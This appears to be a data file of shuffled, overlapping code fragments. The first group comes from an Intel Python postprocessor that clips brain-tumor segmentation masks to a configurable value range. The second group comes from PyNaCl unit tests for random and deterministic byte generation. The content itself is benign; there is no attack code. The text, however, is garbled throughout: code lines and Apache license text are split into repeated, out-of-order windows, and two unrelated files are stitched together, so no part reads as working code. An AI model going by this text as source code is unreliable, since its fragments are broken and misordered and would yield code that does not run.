ClipSegmentationMask(PostprocessorWithSpecificTargets): __provider__ = 'clip_segmentation_mask' annotation_types = (BrainTumorSegmentationAnnotation,", "in annotation: target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value) for target in", "IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "in compliance with the License. You may obtain a copy", "of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law", "you may not use this file except in compliance with", "is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR", "..config import NumberField, ConfigError class ClipSegmentationMask(PostprocessorWithSpecificTargets): __provider__ = 'clip_segmentation_mask' annotation_types", "the License. You may obtain a copy of the License", "agreed to in writing, software distributed under the License is", "\"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "annotation_types = (BrainTumorSegmentationAnnotation, ) prediction_types = (BrainTumorSegmentationPrediction, ) @classmethod def", "process_image(self, annotation, prediction): for target in annotation: target.mask = np.clip(target.mask,", "ClipSegmentationMask(PostprocessorWithSpecificTargets): __provider__ = 'clip_segmentation_mask' annotation_types = (BrainTumorSegmentationAnnotation, ) prediction_types =", "distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS", "at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to", "use this file except in compliance with the License. You", "self.max_value < self.min_value: raise ConfigError('max_value should be greater than min_value')", ") @classmethod def parameters(cls): parameters = super().parameters() parameters.update({ 'min_value': NumberField(value_type=int,", "be greater than min_value') def process_image(self, annotation, prediction): for target", "np from .postprocessor import PostprocessorWithSpecificTargets from ..representation import BrainTumorSegmentationAnnotation, BrainTumorSegmentationPrediction", "the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or", "'clip_segmentation_mask' annotation_types = (BrainTumorSegmentationAnnotation, ) prediction_types = (BrainTumorSegmentationPrediction, ) @classmethod", "ANY KIND, either express or implied. See the License for", "self.get_value_from_config('min_value') self.max_value = self.get_value_from_config('max_value') if self.max_value < self.min_value: raise ConfigError('max_value", "Copyright (c) 2018-2022 Intel Corporation Licensed under the Apache License,", "http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in", "\"\"\" import numpy as np from .postprocessor import PostprocessorWithSpecificTargets from", "may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless", "obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required", "self.get_value_from_config('max_value') if self.max_value < self.min_value: raise ConfigError('max_value should be greater", "}) return parameters def configure(self): self.min_value = self.get_value_from_config('min_value') self.max_value =", "numpy as np from .postprocessor import PostprocessorWithSpecificTargets from ..representation import", "should be greater than min_value') def process_image(self, annotation, prediction): for", "prediction_types = (BrainTumorSegmentationPrediction, ) @classmethod def parameters(cls): parameters = super().parameters()", "import numpy as np from .postprocessor import PostprocessorWithSpecificTargets from ..representation", "either express or implied. See the License for the specific", "super().parameters() parameters.update({ 'min_value': NumberField(value_type=int, min_value=0, optional=True, default=0, description=\"Min value\"), 'max_value':", "BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "under the License is distributed on an \"AS IS\" BASIS,", "\"License\"); you may not use this file except in compliance", "License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES", "Licensed under the Apache License, Version 2.0 (the \"License\"); you", "under the License. \"\"\" import numpy as np from .postprocessor", ") prediction_types = (BrainTumorSegmentationPrediction, ) @classmethod def parameters(cls): parameters =", "(BrainTumorSegmentationAnnotation, ) prediction_types = (BrainTumorSegmentationPrediction, ) @classmethod def parameters(cls): parameters", "ConfigError('max_value should be greater than min_value') def process_image(self, annotation, prediction):", "with the License. You may obtain a copy of the", "License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed", "optional=True, default=0, description=\"Min value\"), 'max_value': NumberField(value_type=int, description=\"Max value\") }) return", "default=0, description=\"Min value\"), 'max_value': NumberField(value_type=int, description=\"Max value\") }) return parameters", "License for the specific language governing permissions and limitations under", "for target in annotation: target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value) for", "value\"), 'max_value': NumberField(value_type=int, description=\"Max value\") }) return parameters def configure(self):", "= np.clip(target.mask, a_min=self.min_value, a_max=self.max_value) for target in prediction: target.mask =", "for target in prediction: target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value) return", "raise ConfigError('max_value should be greater than min_value') def process_image(self, annotation,", "this file except in compliance with the License. You may", "from ..config import NumberField, ConfigError class ClipSegmentationMask(PostprocessorWithSpecificTargets): __provider__ = 'clip_segmentation_mask'", "specific language governing permissions and limitations under the License. \"\"\"", "(the \"License\"); you may not use this file except in", "def configure(self): self.min_value = self.get_value_from_config('min_value') self.max_value = self.get_value_from_config('max_value') if self.max_value", "in prediction: target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value) return annotation, prediction", "= self.get_value_from_config('min_value') self.max_value = self.get_value_from_config('max_value') if self.max_value < self.min_value: raise", "applicable law or agreed to in writing, software distributed under", "\"\"\" Copyright (c) 2018-2022 Intel Corporation Licensed under the Apache", "target in prediction: target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value) return annotation,", "@classmethod def parameters(cls): parameters = super().parameters() parameters.update({ 'min_value': NumberField(value_type=int, min_value=0,", "= (BrainTumorSegmentationPrediction, ) @classmethod def parameters(cls): parameters = super().parameters() parameters.update({", "and limitations under the License. \"\"\" import numpy as np", "the License is distributed on an \"AS IS\" BASIS, WITHOUT", "You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0", "the specific language governing permissions and limitations under the License.", "parameters.update({ 'min_value': NumberField(value_type=int, min_value=0, optional=True, default=0, description=\"Min value\"), 'max_value': NumberField(value_type=int,", "2018-2022 Intel Corporation Licensed under the Apache License, Version 2.0", "License. \"\"\" import numpy as np from .postprocessor import PostprocessorWithSpecificTargets", "self.min_value: raise ConfigError('max_value should be greater than min_value') def process_image(self,", "..representation import BrainTumorSegmentationAnnotation, BrainTumorSegmentationPrediction from ..config import NumberField, ConfigError class", "as np from .postprocessor import PostprocessorWithSpecificTargets from ..representation import BrainTumorSegmentationAnnotation,", "from .postprocessor import PostprocessorWithSpecificTargets from ..representation import BrainTumorSegmentationAnnotation, BrainTumorSegmentationPrediction from", "import NumberField, ConfigError class ClipSegmentationMask(PostprocessorWithSpecificTargets): __provider__ = 'clip_segmentation_mask' annotation_types =", "the Apache License, Version 2.0 (the \"License\"); you may not", "file except in compliance with the License. You may obtain", "except in compliance with the License. You may obtain a", "or implied. See the License for the specific language governing", "KIND, either express or implied. See the License for the", "import PostprocessorWithSpecificTargets from ..representation import BrainTumorSegmentationAnnotation, BrainTumorSegmentationPrediction from ..config import", "return parameters def configure(self): self.min_value = self.get_value_from_config('min_value') self.max_value = self.get_value_from_config('max_value')", "to in writing, software distributed under the License is distributed", "than min_value') def process_image(self, annotation, prediction): for target in annotation:", "or agreed to in writing, software distributed under the License", "annotation, prediction): for target in annotation: target.mask = np.clip(target.mask, a_min=self.min_value,", "def process_image(self, annotation, prediction): for target in annotation: target.mask =", "law or agreed to in writing, software distributed under the", "OR CONDITIONS OF ANY KIND, either express or implied. See", "= self.get_value_from_config('max_value') if self.max_value < self.min_value: raise ConfigError('max_value should be", "(c) 2018-2022 Intel Corporation Licensed under the Apache License, Version", "compliance with the License. You may obtain a copy of", "target in annotation: target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value) for target", "language governing permissions and limitations under the License. \"\"\" import", "self.max_value = self.get_value_from_config('max_value') if self.max_value < self.min_value: raise ConfigError('max_value should", "NumberField(value_type=int, description=\"Max value\") }) return parameters def configure(self): self.min_value =", "OF ANY KIND, either express or implied. See the License", "(BrainTumorSegmentationPrediction, ) @classmethod def parameters(cls): parameters = super().parameters() parameters.update({ 'min_value':", "under the Apache License, Version 2.0 (the \"License\"); you may", "on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF", "the License. \"\"\" import numpy as np from .postprocessor import", "min_value') def process_image(self, annotation, prediction): for target in annotation: target.mask", "min_value=0, optional=True, default=0, description=\"Min value\"), 'max_value': NumberField(value_type=int, description=\"Max value\") })", "= 'clip_segmentation_mask' annotation_types = (BrainTumorSegmentationAnnotation, ) prediction_types = (BrainTumorSegmentationPrediction, )", "description=\"Max value\") }) return parameters def configure(self): self.min_value = self.get_value_from_config('min_value')", "self.min_value = self.get_value_from_config('min_value') self.max_value = self.get_value_from_config('max_value') if self.max_value < self.min_value:", "description=\"Min value\"), 'max_value': NumberField(value_type=int, description=\"Max value\") }) return parameters def", "License, Version 2.0 (the \"License\"); you may not use this", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "Intel Corporation Licensed under the Apache License, Version 2.0 (the", "for the specific language governing permissions and limitations under the", "See the License for the specific language governing permissions and", "parameters = super().parameters() parameters.update({ 'min_value': NumberField(value_type=int, min_value=0, optional=True, default=0, description=\"Min", "prediction): for target in annotation: target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value)", "a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by", "governing permissions and limitations under the License. \"\"\" import numpy", "parameters def configure(self): self.min_value = self.get_value_from_config('min_value') self.max_value = self.get_value_from_config('max_value') if", "target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value) for target in prediction: target.mask", "configure(self): self.min_value = self.get_value_from_config('min_value') self.max_value = self.get_value_from_config('max_value') if self.max_value <", "= super().parameters() parameters.update({ 'min_value': NumberField(value_type=int, min_value=0, optional=True, default=0, description=\"Min value\"),", "class ClipSegmentationMask(PostprocessorWithSpecificTargets): __provider__ = 'clip_segmentation_mask' annotation_types = (BrainTumorSegmentationAnnotation, ) prediction_types", "License. You may obtain a copy of the License at", "np.clip(target.mask, a_min=self.min_value, a_max=self.max_value) for target in prediction: target.mask = np.clip(target.mask,", "BrainTumorSegmentationAnnotation, BrainTumorSegmentationPrediction from ..config import NumberField, ConfigError class ClipSegmentationMask(PostprocessorWithSpecificTargets): __provider__", "value\") }) return parameters def configure(self): self.min_value = self.get_value_from_config('min_value') self.max_value", "the License for the specific language governing permissions and limitations", "may not use this file except in compliance with the", "in writing, software distributed under the License is distributed on", "= (BrainTumorSegmentationAnnotation, ) prediction_types = (BrainTumorSegmentationPrediction, ) @classmethod def parameters(cls):", "required by applicable law or agreed to in writing, software", "a_min=self.min_value, a_max=self.max_value) for target in prediction: target.mask = np.clip(target.mask, a_min=self.min_value,", "implied. See the License for the specific language governing permissions", "import BrainTumorSegmentationAnnotation, BrainTumorSegmentationPrediction from ..config import NumberField, ConfigError class ClipSegmentationMask(PostprocessorWithSpecificTargets):", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "BrainTumorSegmentationPrediction from ..config import NumberField, ConfigError class ClipSegmentationMask(PostprocessorWithSpecificTargets): __provider__ =", "an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY", "'max_value': NumberField(value_type=int, description=\"Max value\") }) return parameters def configure(self): self.min_value", "a_max=self.max_value) for target in prediction: target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value)", "PostprocessorWithSpecificTargets from ..representation import BrainTumorSegmentationAnnotation, BrainTumorSegmentationPrediction from ..config import NumberField,", "<gh_stars>1000+ \"\"\" Copyright (c) 2018-2022 Intel Corporation Licensed under the", "__provider__ = 'clip_segmentation_mask' annotation_types = (BrainTumorSegmentationAnnotation, ) prediction_types = (BrainTumorSegmentationPrediction,", "< self.min_value: raise ConfigError('max_value should be greater than min_value') def" ]
[ "import nacl.secret import nacl.utils def test_random_bytes_produces(): assert len(nacl.utils.random(16)) == 16", "from 32 bytes\" seed = b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\" with pytest.raises(TypeError) as e:", "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\" with pytest.raises(TypeError) as e: nacl.utils.randombytes_deterministic(100, seed) assert expected in", "32 bytes\" seed = b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\" with pytest.raises(TypeError) as e: nacl.utils.randombytes_deterministic(100,", "# # Licensed under the Apache License, Version 2.0 (the", "compliance with the License. # You may obtain a copy", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "2.0 (the \"License\"); # you may not use this file", "agreed to in writing, software # distributed under the License", "file except in compliance with the License. # You may", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "Unless required by applicable law or agreed to in writing,", "str(b\"\\x00\" * 32) def test_deterministic_random_bytes(): expected = ( b\"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba\" b\"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f\"", "def test_deterministic_random_bytes(): expected = ( b\"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba\" b\"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f\" b\"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf\" b\"982a1bb4587a5c970ff0810ca3b791d7e12\" )", "def test_string_fixer(): assert str(nacl.secret.SecretBox(b\"\\x00\" * 32)) == str(b\"\\x00\" * 32)", "distributed under the License is distributed on an \"AS IS\"", "seed = ( b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\" b\"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\" b\"\\x1c\\x1d\\x1e\\x1f\" ) assert ( nacl.utils.randombytes_deterministic(", "def test_random_bytes_produces_different_bytes(): assert nacl.utils.random(16) != nacl.utils.random(16) def test_string_fixer(): assert str(nacl.secret.SecretBox(b\"\\x00\"", "# Copyright 2013 <NAME> and individual contributors # # Licensed", "random bytes must be generated from 32 bytes\" seed =", "<NAME> and individual contributors # # Licensed under the Apache", "nacl.utils.randombytes_deterministic( 100, seed, encoder=nacl.utils.encoding.HexEncoder ) == expected ) def test_deterministic_random_bytes_invalid_seed_length():", "the specific language governing permissions and # limitations under the", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "express or implied. # See the License for the specific", "applicable law or agreed to in writing, software # distributed", "!= nacl.utils.random(16) def test_string_fixer(): assert str(nacl.secret.SecretBox(b\"\\x00\" * 32)) == str(b\"\\x00\"", "except in compliance with the License. # You may obtain", "of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless", "b\"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f\" b\"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf\" b\"982a1bb4587a5c970ff0810ca3b791d7e12\" ) seed = ( b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\" b\"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\" b\"\\x1c\\x1d\\x1e\\x1f\"", "Licensed under the Apache License, Version 2.0 (the \"License\"); #", ") == expected ) def test_deterministic_random_bytes_invalid_seed_length(): expected = \"Deterministic random", "not use this file except in compliance with the License.", "permissions and # limitations under the License. import pytest import", "* 32) def test_deterministic_random_bytes(): expected = ( b\"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba\" b\"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f\" b\"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf\"", "writing, software # distributed under the License is distributed on", "in writing, software # distributed under the License is distributed", "32) def test_deterministic_random_bytes(): expected = ( b\"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba\" b\"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f\" b\"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf\" b\"982a1bb4587a5c970ff0810ca3b791d7e12\"", "you may not use this file except in compliance with", "b\"982a1bb4587a5c970ff0810ca3b791d7e12\" ) seed = ( b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\" b\"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\" b\"\\x1c\\x1d\\x1e\\x1f\" ) assert", "# Licensed under the Apache License, Version 2.0 (the \"License\");", "language governing permissions and # limitations under the License. import", "expected = \"Deterministic random bytes must be generated from 32", "( nacl.utils.randombytes_deterministic( 100, seed, encoder=nacl.utils.encoding.HexEncoder ) == expected ) def", "assert nacl.utils.random(16) != nacl.utils.random(16) def test_string_fixer(): assert str(nacl.secret.SecretBox(b\"\\x00\" * 32))", "100, seed, encoder=nacl.utils.encoding.HexEncoder ) == expected ) def test_deterministic_random_bytes_invalid_seed_length(): expected", "* 32)) == str(b\"\\x00\" * 32) def test_deterministic_random_bytes(): expected =", "assert ( nacl.utils.randombytes_deterministic( 100, seed, encoder=nacl.utils.encoding.HexEncoder ) == expected )", "use this file except in compliance with the License. #", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "import nacl.utils def test_random_bytes_produces(): assert len(nacl.utils.random(16)) == 16 def test_random_bytes_produces_different_bytes():", "CONDITIONS OF ANY KIND, either express or implied. # See", "the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "# limitations under the License. import pytest import nacl.secret import", "or implied. # See the License for the specific language", "License is distributed on an \"AS IS\" BASIS, # WITHOUT", "License. # You may obtain a copy of the License", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "License, Version 2.0 (the \"License\"); # you may not use", "governing permissions and # limitations under the License. import pytest", "( b\"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba\" b\"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f\" b\"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf\" b\"982a1bb4587a5c970ff0810ca3b791d7e12\" ) seed = ( b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\"", "# You may obtain a copy of the License at", "limitations under the License. import pytest import nacl.secret import nacl.utils", "KIND, either express or implied. # See the License for", "specific language governing permissions and # limitations under the License.", "the License. import pytest import nacl.secret import nacl.utils def test_random_bytes_produces():", "def test_deterministic_random_bytes_invalid_seed_length(): expected = \"Deterministic random bytes must be generated", "def test_random_bytes_produces(): assert len(nacl.utils.random(16)) == 16 def test_random_bytes_produces_different_bytes(): assert nacl.utils.random(16)", "( b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\" b\"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\" b\"\\x1c\\x1d\\x1e\\x1f\" ) assert ( nacl.utils.randombytes_deterministic( 100, seed,", "under the License is distributed on an \"AS IS\" BASIS,", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "License for the specific language governing permissions and # limitations", "individual contributors # # Licensed under the Apache License, Version", "expected = ( b\"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba\" b\"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f\" b\"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf\" b\"982a1bb4587a5c970ff0810ca3b791d7e12\" ) seed =", "License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by", "== 16 def test_random_bytes_produces_different_bytes(): assert nacl.utils.random(16) != nacl.utils.random(16) def test_string_fixer():", "test_random_bytes_produces(): assert len(nacl.utils.random(16)) == 16 def test_random_bytes_produces_different_bytes(): assert nacl.utils.random(16) !=", "b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\" b\"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\" b\"\\x1c\\x1d\\x1e\\x1f\" ) assert ( nacl.utils.randombytes_deterministic( 100, seed, encoder=nacl.utils.encoding.HexEncoder", "pytest import nacl.secret import nacl.utils def test_random_bytes_produces(): assert len(nacl.utils.random(16)) ==", ") def test_deterministic_random_bytes_invalid_seed_length(): expected = \"Deterministic random bytes must be", "assert len(nacl.utils.random(16)) == 16 def test_random_bytes_produces_different_bytes(): assert nacl.utils.random(16) != nacl.utils.random(16)", "test_deterministic_random_bytes_invalid_seed_length(): expected = \"Deterministic random bytes must be generated from", "License. import pytest import nacl.secret import nacl.utils def test_random_bytes_produces(): assert", "nacl.utils.random(16) def test_string_fixer(): assert str(nacl.secret.SecretBox(b\"\\x00\" * 32)) == str(b\"\\x00\" *", "the License for the specific language governing permissions and #", "must be generated from 32 bytes\" seed = b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\" with", "(the \"License\"); # you may not use this file except", "= \"Deterministic random bytes must be generated from 32 bytes\"", "Apache License, Version 2.0 (the \"License\"); # you may not", "# you may not use this file except in compliance", "either express or implied. # See the License for the", "under the License. import pytest import nacl.secret import nacl.utils def", "OR CONDITIONS OF ANY KIND, either express or implied. #", "contributors # # Licensed under the Apache License, Version 2.0", "# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "the License is distributed on an \"AS IS\" BASIS, #", ") assert ( nacl.utils.randombytes_deterministic( 100, seed, encoder=nacl.utils.encoding.HexEncoder ) == expected", "in compliance with the License. # You may obtain a", "str(nacl.secret.SecretBox(b\"\\x00\" * 32)) == str(b\"\\x00\" * 32) def test_deterministic_random_bytes(): expected", "seed, encoder=nacl.utils.encoding.HexEncoder ) == expected ) def test_deterministic_random_bytes_invalid_seed_length(): expected =", "software # distributed under the License is distributed on an", "bytes\" seed = b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\" with pytest.raises(TypeError) as e: nacl.utils.randombytes_deterministic(100, seed)", "32)) == str(b\"\\x00\" * 32) def test_deterministic_random_bytes(): expected = (", "# # Unless required by applicable law or agreed to", "= ( b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\" b\"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\" b\"\\x1c\\x1d\\x1e\\x1f\" ) assert ( nacl.utils.randombytes_deterministic( 100,", "nacl.secret import nacl.utils def test_random_bytes_produces(): assert len(nacl.utils.random(16)) == 16 def", "a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #", "bytes must be generated from 32 bytes\" seed = b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\"", "obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "expected ) def test_deterministic_random_bytes_invalid_seed_length(): expected = \"Deterministic random bytes must", "b\"\\x1c\\x1d\\x1e\\x1f\" ) assert ( nacl.utils.randombytes_deterministic( 100, seed, encoder=nacl.utils.encoding.HexEncoder ) ==", "Version 2.0 (the \"License\"); # you may not use this", "law or agreed to in writing, software # distributed under", "test_string_fixer(): assert str(nacl.secret.SecretBox(b\"\\x00\" * 32)) == str(b\"\\x00\" * 32) def", "b\"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba\" b\"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f\" b\"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf\" b\"982a1bb4587a5c970ff0810ca3b791d7e12\" ) seed = ( b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\" b\"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\"", "2013 <NAME> and individual contributors # # Licensed under the", "== expected ) def test_deterministic_random_bytes_invalid_seed_length(): expected = \"Deterministic random bytes", "len(nacl.utils.random(16)) == 16 def test_random_bytes_produces_different_bytes(): assert nacl.utils.random(16) != nacl.utils.random(16) def", "implied. # See the License for the specific language governing", "b\"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\" b\"\\x1c\\x1d\\x1e\\x1f\" ) assert ( nacl.utils.randombytes_deterministic( 100, seed, encoder=nacl.utils.encoding.HexEncoder )", "\"Deterministic random bytes must be generated from 32 bytes\" seed", "under the Apache License, Version 2.0 (the \"License\"); # you", "b\"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf\" b\"982a1bb4587a5c970ff0810ca3b791d7e12\" ) seed = ( b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\" b\"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\" b\"\\x1c\\x1d\\x1e\\x1f\" )", "\"License\"); # you may not use this file except in", "= b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\" with pytest.raises(TypeError) as e: nacl.utils.randombytes_deterministic(100, seed) assert expected", "distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "encoder=nacl.utils.encoding.HexEncoder ) == expected ) def test_deterministic_random_bytes_invalid_seed_length(): expected = \"Deterministic", "test_random_bytes_produces_different_bytes(): assert nacl.utils.random(16) != nacl.utils.random(16) def test_string_fixer(): assert str(nacl.secret.SecretBox(b\"\\x00\" *", "be generated from 32 bytes\" seed = b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\" with pytest.raises(TypeError)", ") seed = ( b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\" b\"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\" b\"\\x1c\\x1d\\x1e\\x1f\" ) assert (", "generated from 32 bytes\" seed = b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\" with pytest.raises(TypeError) as", "by applicable law or agreed to in writing, software #", "# distributed under the License is distributed on an \"AS", "OF ANY KIND, either express or implied. # See the", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "may obtain a copy of the License at # #", "# Unless required by applicable law or agreed to in", "ANY KIND, either express or implied. # See the License", "See the License for the specific language governing permissions and", "16 def test_random_bytes_produces_different_bytes(): assert nacl.utils.random(16) != nacl.utils.random(16) def test_string_fixer(): assert", "the License. # You may obtain a copy of the", "at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "for the specific language governing permissions and # limitations under", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY", "Copyright 2013 <NAME> and individual contributors # # Licensed under", "to in writing, software # distributed under the License is", "= ( b\"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba\" b\"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f\" b\"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf\" b\"982a1bb4587a5c970ff0810ca3b791d7e12\" ) seed = (", "assert str(nacl.secret.SecretBox(b\"\\x00\" * 32)) == str(b\"\\x00\" * 32) def test_deterministic_random_bytes():", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "# See the License for the specific language governing permissions", "import pytest import nacl.secret import nacl.utils def test_random_bytes_produces(): assert len(nacl.utils.random(16))", "with pytest.raises(TypeError) as e: nacl.utils.randombytes_deterministic(100, seed) assert expected in str(e.value)", "You may obtain a copy of the License at #", "may not use this file except in compliance with the", "or agreed to in writing, software # distributed under the", "and individual contributors # # Licensed under the Apache License,", "seed = b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\" with pytest.raises(TypeError) as e: nacl.utils.randombytes_deterministic(100, seed) assert", "required by applicable law or agreed to in writing, software", "BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "and # limitations under the License. import pytest import nacl.secret", "with the License. # You may obtain a copy of", "this file except in compliance with the License. # You", "nacl.utils def test_random_bytes_produces(): assert len(nacl.utils.random(16)) == 16 def test_random_bytes_produces_different_bytes(): assert", "the Apache License, Version 2.0 (the \"License\"); # you may", "test_deterministic_random_bytes(): expected = ( b\"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba\" b\"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f\" b\"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf\" b\"982a1bb4587a5c970ff0810ca3b791d7e12\" ) seed", "== str(b\"\\x00\" * 32) def test_deterministic_random_bytes(): expected = ( b\"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba\"", "nacl.utils.random(16) != nacl.utils.random(16) def test_string_fixer(): assert str(nacl.secret.SecretBox(b\"\\x00\" * 32)) ==", "<filename>tests/test_utils.py # Copyright 2013 <NAME> and individual contributors # #" ]
[]
